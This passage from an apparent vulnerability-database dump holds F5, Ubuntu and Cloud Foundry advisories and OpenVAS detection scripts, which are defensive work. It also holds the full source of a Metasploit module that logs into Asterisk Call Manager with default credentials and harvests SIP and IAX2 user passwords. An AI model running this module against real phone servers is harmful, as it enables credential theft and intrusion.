\n13.0.1 \n12.1.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP APM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP ASM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | ASM control plane, iControl SOAP, eventd \nBIG-IP DNS | 13.0.0 \n12.0.0 - 12.1.3 | 13.1.0 \n13.0.1 \n12.1.3.2 | High | big3d, gtmd, iControl SOAP, eventd \nBIG-IP Edge Gateway | 11.2.1 | None | High | iControl SOAP, eventd \nBIG-IP GTM | 11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 11.6.3.2 \n11.5.7 | High | big3d, gtmd, iControl SOAP, eventd \nBIG-IP Link Controller | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | 
High | big3d, gtmd, iControl SOAP, eventd \nBIG-IP PEM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP PSM | 11.4.1 | None | High | iControl SOAP, eventd \nBIG-IP WebAccelerator | 11.2.1 | None | High | iControl SOAP, eventd \nBIG-IP WebSafe | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | iControlPortal.cgi \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\niControl SOAP, eventd and BIG-IP ASM control plane\n\nTo mitigate this vulnerability for iControl SOAP, the **eventd** process, and the BIG-IP ASM control plane, permit management access to F5 products only over a secure network and restrict command line access for affected systems to trusted users. 
For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 13.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\nbig3d/gtmd\n\nTo mitigate this vulnerability for the **big3d**/**gtmd** process, limit connections to port 4353 to trusted hosts. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 13.x)](<https://support.f5.com/csp/article/K13309>).\n\n**Note**: If you run **big3d_install** on BIG-IP versions prior to 11.5.0, it is possible that you may install a vulnerable version of **big3d** on systems that are running non-vulnerable versions of the BIG-IP system. In this case, upgrade to a fixed version or hotfix, and refer to [K13312: Overview of the BIG-IP DNS big3d_install, bigip_add, and gtm_add utilities (11.x - 13.x)](<https://support.f5.com/csp/article/K13312>) for information about running **big3d_install** to resolve the issue. \n\n**Note**: The iquery protocol used by the BIG-IP DNS system (formerly BIG-IP GTM) also uses port 4353. 
Ensure that all of the peer devices are included when you limit connections by IP address.\n\n * [K17329: BIG-IP GTM name has changed to BIG-IP DNS](<https://support.f5.com/csp/article/K17329>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n", "modified": "2018-07-24T04:32:00", "published": "2017-09-19T00:55:00", "id": "F5:K52320548", "href": "https://support.f5.com/csp/article/K52320548", "title": "Expat vulnerability CVE-2016-0718", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2019-12-07T06:58:25", "bulletinFamily": "exploit", "description": "This module retrieves SIP and IAX2 user extensions and credentials from Asterisk Call Manager service. 
Valid manager credentials are required.\n", "modified": "2019-08-15T23:10:44", "published": "2017-07-23T09:55:12", "id": "MSF:AUXILIARY/GATHER/ASTERISK_CREDS", "href": "", "type": "metasploit", "title": "Asterisk Gather Credentials", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Asterisk Gather Credentials',\n 'Description' => %q{\n This module retrieves SIP and IAX2 user extensions and credentials from\n Asterisk Call Manager service. Valid manager credentials are required.\n },\n 'Author' => 'bcoles',\n 'References' =>\n [\n ['URL', 'http://www.asterisk.name/sip1.html'],\n ['URL', 'http://www.asterisk.name/iax2.html'],\n ['URL', 'https://www.voip-info.org/wiki/view/Asterisk+manager+API'],\n ['URL', 'https://www.voip-info.org/wiki-Asterisk+CLI']\n ],\n 'License' => MSF_LICENSE))\n register_options [\n Opt::RPORT(5038),\n OptString.new('USERNAME', [true, 'The username for Asterisk Call Manager', 'admin']),\n OptString.new('PASSWORD', [true, 'The password for the specified username', 'amp111'])\n ]\n end\n\n def run\n vprint_status 'Connecting...'\n\n connect\n banner = sock.get_once\n\n unless banner =~ %r{Asterisk Call Manager/([\\d\\.]+)}\n fail_with Failure::BadConfig, 'Asterisk Call Manager does not appear to be running'\n end\n\n print_status \"Found Asterisk Call Manager version #{$1}\"\n\n unless login\n fail_with Failure::NoAccess, 'Authentication failed'\n end\n\n print_good 'Authenticated successfully'\n\n @users = []\n retrieve_users 'sip'\n retrieve_users 'iax2'\n\n if @users.empty?\n print_error 'Did not find any users'\n return\n end\n\n print_status \"Found #{@users.length} users\"\n\n cred_table = Rex::Text::Table.new 'Header' => 'Asterisk User Credentials',\n 
'Indent' => 1,\n 'Columns' => ['Username', 'Secret', 'Type']\n\n @users.each do |user|\n cred_table << [ user['username'],\n user['password'],\n user['type'] ]\n report_cred user: user['username'],\n password: user['password'],\n proof: \"#{user['type']} show users\"\n end\n\n print_line\n print_line cred_table.to_s\n\n p = store_loot 'asterisk.user.creds',\n 'text/csv',\n rhost,\n cred_table.to_csv,\n 'Asterisk User Credentials'\n\n print_good \"Credentials saved in: #{p}\"\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n print_error e.message\n ensure\n disconnect\n end\n\n private\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def report_cred(opts)\n service_data = {\n address: rhost,\n port: rport,\n service_name: 'asterisk_manager',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge service_data\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED,\n proof: opts[:proof]\n }.merge service_data\n\n create_credential_login login_data\n end\n\n def send_command(cmd = '')\n sock.put cmd\n\n res = ''\n timeout = 15\n Timeout.timeout(timeout) do\n res << sock.get_once while res !~ /\\r?\\n\\r?\\n/\n end\n\n res\n rescue Timeout::Error\n print_error \"Timeout (#{timeout} seconds)\"\n rescue => e\n print_error e.message\n end\n\n def login\n vprint_status \"Authenticating as '#{username}'\"\n\n req = \"action: login\\r\\n\"\n req << \"username: #{username}\\r\\n\"\n req << \"secret: #{password}\\r\\n\"\n req << \"events: off\\r\\n\"\n req << \"\\r\\n\"\n res = send_command req\n\n return false unless res =~ /Response: Success/\n\n report_cred user: username,\n password: password,\n proof: 'Response: Success'\n\n report_service :host => rhost,\n 
:port => rport,\n :proto => 'tcp',\n :name => 'asterisk'\n true\n end\n\n def retrieve_users(type)\n vprint_status \"Retrieving #{type.upcase} users...\"\n\n req = \"action: command\\r\\n\"\n req << \"command: #{type} show users\\r\\n\"\n req << \"\\r\\n\"\n res = send_command req\n\n if res =~ /Response: Error/ && res =~ /Message: Permission denied/\n print_error 'Insufficient privileges'\n return\n end\n\n unless res =~ /Response: Follows/\n print_error 'Unexpected reply'\n return\n end\n\n # The response is a whitespace formatted table\n # We're only interested in the first two columns: username and secret\n # To parse the table, we need the character width of these two columns\n if res =~ /^(Username\\s+)(Secret\\s+)/\n user_len = $1.length\n pass_len = $2.length\n else\n print_error \"'#{type} show users' is not supported\"\n return\n end\n\n users = res.scan(/^Username\\s+Secret.*?\\r?\\n(.*)--END COMMAND--/m).flatten.first\n\n if users.blank?\n print_error \"Did not find any #{type.upcase} users\"\n return\n else\n print_status \"Found #{type.upcase} users\"\n end\n\n users.each_line do |line|\n line.chomp!\n user = line[0...user_len].sub(/\\s+$/, '')\n pass = line[user_len...(user_len + pass_len)].sub(/\\s+$/, '')\n @users << { 'username' => user, 'password' => pass, 'type' => type }\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/asterisk_creds.rb"}], "openvas": [{"lastseen": "2019-07-17T14:18:49", "bulletinFamily": "scanner", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2017-07-20T00:00:00", "id": "OPENVAS:1361412562310811536", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811536", "title": "Apple Mac OS X Multiple Vulnerabilities-HT207922", "type": "openvas", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-HT207922\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811536\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2017-7016\", \"CVE-2017-7033\", \"CVE-2017-7015\", \"CVE-2017-7050\",\n \"CVE-2017-7054\", \"CVE-2017-7062\", \"CVE-2017-7008\", \"CVE-2016-9586\",\n \"CVE-2016-9594\", \"CVE-2017-2629\", \"CVE-2017-7468\", \"CVE-2017-7014\",\n \"CVE-2017-7017\", \"CVE-2017-7035\", \"CVE-2017-7044\", \"CVE-2017-7036\",\n \"CVE-2017-7045\", \"CVE-2017-7025\", \"CVE-2017-7027\", \"CVE-2017-7069\",\n \"CVE-2017-7026\", \"CVE-2017-7068\", \"CVE-2017-9417\");\n script_bugtraq_id(99882, 99883, 99880, 95019, 95094, 96382, 97962, 99482);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", 
value:\"2017-07-20 12:23:38 +0530 (Thu, 20 Jul 2017)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-HT207922\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A buffer overflow error.\n\n - Multiple input validation issues.\n\n - Multiple issues in curl.\n\n - An input validation issue.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to obtain sensitive information, gain extra privileges and execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.12.x before\n 10.12.6\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version\n 10.12.6 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207922\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.12\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer){\n exit(0);\n}\n\nif(\"Mac OS X\" >< osName && osVer =~ \"^10\\.12\")\n{\n if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.5\"))\n {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.12.6\");\n security_message(data:report);\n exit(0);\n }\n}\n\nexit(99);", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:05", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-05-18T00:00:00", "id": "OPENVAS:1361412562310843174", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843174", "title": "Ubuntu Update for bash USN-3294-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for bash USN-3294-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843174\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-18 06:50:06 +0200 (Thu, 18 May 2017)\");\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\", \"CVE-2016-9401\", \"CVE-2017-5932\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for bash USN-3294-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Bernd Dietzel discovered that Bash\n incorrectly expanded the hostname when displaying the prompt. If a remote\n attacker were able to modify a hostname, this flaw could be exploited to execute\n arbitrary code. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and\n Ubuntu 16.10. (CVE-2016-0634) It was discovered that Bash incorrectly handled\n the SHELLOPTS and PS4 environment variables. A local attacker could use this\n issue to execute arbitrary code with root privileges. This issue only affected\n Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7543) It was\n discovered that Bash incorrectly handled the popd command. 
A remote attacker\n could possibly use this issue to bypass restricted shells. (CVE-2016-9401) It\n was discovered that Bash incorrectly handled path autocompletion. A local\n attacker could possibly use this issue to execute arbitrary code. This issue\n only affected Ubuntu 17.04. (CVE-2017-5932)\");\n script_tag(name:\"affected\", value:\"bash on Ubuntu 17.04,\n Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3294-1\");\n script_xref(name:\"URL\", value:\"https://www.ubuntu.com/usn/usn-3294-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-7ubuntu1.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.4-2ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-15ubuntu1.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", 
ver:\"4.3-14ubuntu1.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:55", "bulletinFamily": "scanner", "description": "dict.c in libxml2 allows remote attackers to cause a denial of service (heap-based buffer over-read and application crash) via an unexpected character immediately after the ", "modified": "2018-10-26T00:00:00", "published": "2017-03-17T00:00:00", "id": "OPENVAS:1361412562310140193", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140193", "title": "F5 BIG-IP - libxml2 vulnerability CVE-2015-8806", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_f5_big_ip_K04450715.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# F5 BIG-IP - libxml2 vulnerability CVE-2015-8806\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140193\");\n script_cve_id(\"CVE-2015-8806\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"F5 BIG-IP - libxml2 vulnerability CVE-2015-8806\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K04450715\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n script_tag(name:\"summary\", value:\"dict.c in libxml2 allows remote attackers to cause a denial of service (heap-based buffer over-read and application crash) via an unexpected character immediately after the '<!DOCTYPE html' substring in a crafted HTML document.\");\n script_tag(name:\"impact\", value:\"This vulnerability allows disruption of service.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-17 10:24:10 +0100 (Fri, 17 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n 
script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) ) exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '12.1.2;');\n\nif( report = is_f5_vulnerable( ca:check_f5, version:version ) )\n{\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:33:05", "bulletinFamily": "software", "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nBernd Dietzel discovered that Bash incorrectly expanded the hostname when displaying the prompt. If a remote attacker were able to modify a hostname, this flaw could be exploited to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. 
([CVE-2016-0634](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-0634>))\n\nIt was discovered that Bash incorrectly handled the SHELLOPTS and PS4 environment variables. A local attacker could use this issue to execute arbitrary code with root privileges. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. ([CVE-2016-7543](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7543>))\n\nIt was discovered that Bash incorrectly handled the popd command. A remote attacker could possibly use this issue to bypass restricted shells. ([CVE-2016-9401](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9401>))\n\nIt was discovered that Bash incorrectly handled path autocompletion. A local attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 17.04. ([CVE-2017-5932](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-5932>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3263.x versions prior to 3263.26\n * 3312.x versions prior to 3312.26\n * 3363.x versions prior to 3363.24\n * All other stemcells not listed.\n * All versions of Cloud Foundry cflinuxfs2 prior to 1.122.0\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3263.x versions to 3263.26 or later\n * Upgrade 3312.x versions to 3312.26 or later\n * Upgrade 3363.x versions to 3363.24 or later\n * All other stemcells should be upgraded to the latest version.\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 version 1.122.0 or later.\n\n# References\n\n * [USN-3294-1](<http://www.ubuntu.com/usn/usn-3294-1/>)\n * [CVE-2016-0634](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-0634>)\n * 
[CVE-2016-7543](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7543>)\n * [CVE-2016-9401](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9401>)\n * [CVE-2017-5932](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-5932>)\n * [bosh.io](<https://bosh.io>)\n", "modified": "2017-06-02T00:00:00", "published": "2017-06-02T00:00:00", "id": "CFOUNDRY:550B80029A731B9F485A20D2CDC3D5E4", "href": "https://www.cloudfoundry.org/blog/usn-3294-1/", "title": "USN-3294-1: Bash vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2019-05-29T19:20:44", "bulletinFamily": "unix", "description": "Bernd Dietzel discovered that Bash incorrectly expanded the hostname when displaying the prompt. If a remote attacker were able to modify a hostname, this flaw could be exploited to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-0634)\n\nIt was discovered that Bash incorrectly handled the SHELLOPTS and PS4 environment variables. A local attacker could use this issue to execute arbitrary code with root privileges. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7543)\n\nIt was discovered that Bash incorrectly handled the popd command. A remote attacker could possibly use this issue to bypass restricted shells. (CVE-2016-9401)\n\nIt was discovered that Bash incorrectly handled path autocompletion. A local attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 17.04. (CVE-2017-5932)", "modified": "2017-05-17T00:00:00", "published": "2017-05-17T00:00:00", "id": "USN-3294-1", "href": "https://usn.ubuntu.com/3294-1/", "title": "Bash vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}